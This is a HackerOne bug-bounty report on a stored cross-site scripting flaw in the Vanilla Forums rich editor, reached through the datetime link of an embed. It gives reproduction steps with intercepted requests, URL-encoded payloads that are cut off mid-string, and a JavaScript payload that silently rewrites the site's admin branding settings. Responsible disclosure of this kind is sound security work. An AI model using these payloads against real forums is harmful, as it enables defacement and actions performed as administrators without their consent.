Vanilla: Stored XSS in Rich editor via Embed datetime

ID H1:530458
Type hackerone
Reporter klmunday
Modified 2019-07-17T20:14:22


Summary: Rich embed posts can contain javascript URIs which when clicked will trigger javascript code.

Description: Registered users can post content (in forum posts, private messages and activity posts) containing Rich embeds where the date/time of the embedded post when clicked, will trigger a stored XSS vulnerability.

Steps to reproduce:

  1. Ensure you are logged into an account (does not need any special permissions, just a regular account)
  2. Navigate to any page with the rich text editor (e.g. http://localhost/profile/)
  3. Write anything in the editor and click Share/send
  4. Intercept the request (Via BurpSuite etc)
  5. Edit the request and change the Comment parameter to the following: %5B%7B%22insert%22%3A%7B%22embed-external%22%3A%7B%22data%22%3A%7B%22url%22%3A%22%22%2C%22type%22%3A%22quote%22%2C%22name%22%3Anull%2C%22body%22%3Anull%2C%22photoUrl%22%3Anull%2C%22height%22%3Anull%2C%22width%22%3Anull%2C%22attributes%22%3A%7B%22commentID%22%3A2%2C%22bodyRaw%22%3A%22this%20is%20an%20xss%20test%2C%20click%20the%20date%20tim
  6. Forward the request
  7. Click the date/time in the embed
  8. XSS should be triggered

Simple video


It also does not occur only on forum posts as shown above It works on private messages:


It also works on Activity posts:


Anything else we should know?

More complex payloads can be embedded by utilizing Eval with an array of character codes and specific payloads can be created to target Admins to perform nearly any action an attacker desired. (see video below)


the Comment used in this video is:

%5B%7B%22insert%22%3A%7B%22embed-external%22%3A%7B%22data%22%3A%7B%22url%22%3A%22%22%2C%22type%22%3A%22quote%22%2C%22name%22%3Anull%2C%22body%22%3Anull%2C%22photoUrl%22%3Anull%2C%22height%22%3Anull%2C%22width%22%3Anull%2C%22attributes%22%3A%7B%22commentID%22%3A2%2C%22bodyRaw%22%3A%22this%20is%20an%20xss%20test%2C%20click%20the%20date%20tim and contains the following code: ```js let url = location.origin + '/dashboard/settings/branding';

parent.jQuery.ajax({url: url, type: 'GET', success: function(html_response) { let dom = parent.jQuery(html_response); dom.find('input[name="Garden-dot-HomepageTitle"]').val("Hacked"); dom.find('input[name="Garden-dot-Title"]').val("Hacked"); dom.find('textarea[name="Garden-dot-Description"]').val("hacked via xss"); let data = new FormData(dom.find('form')[0]); parent.jQuery.ajax({url: url, type: 'POST', enctype: 'multipart/form-data', processData: false, contentType: false, cache: false, data: data}) }}); ```

Suggested fix/notes

It seems to be a consistent issue with how embeds are handled within the context of Rich posts. As stated earlier it seems to happen anywhere they can be sent: Activity posts, private messages, forum replies, forum post creation. Common component seems to be the richEditor


An attacker could craft a payload which when triggered could perform sensitive actions such as reading private information, change certain details and even create/edit posts. If an admin was targeted then the scope of data and actions increases to nearly cover the entire site.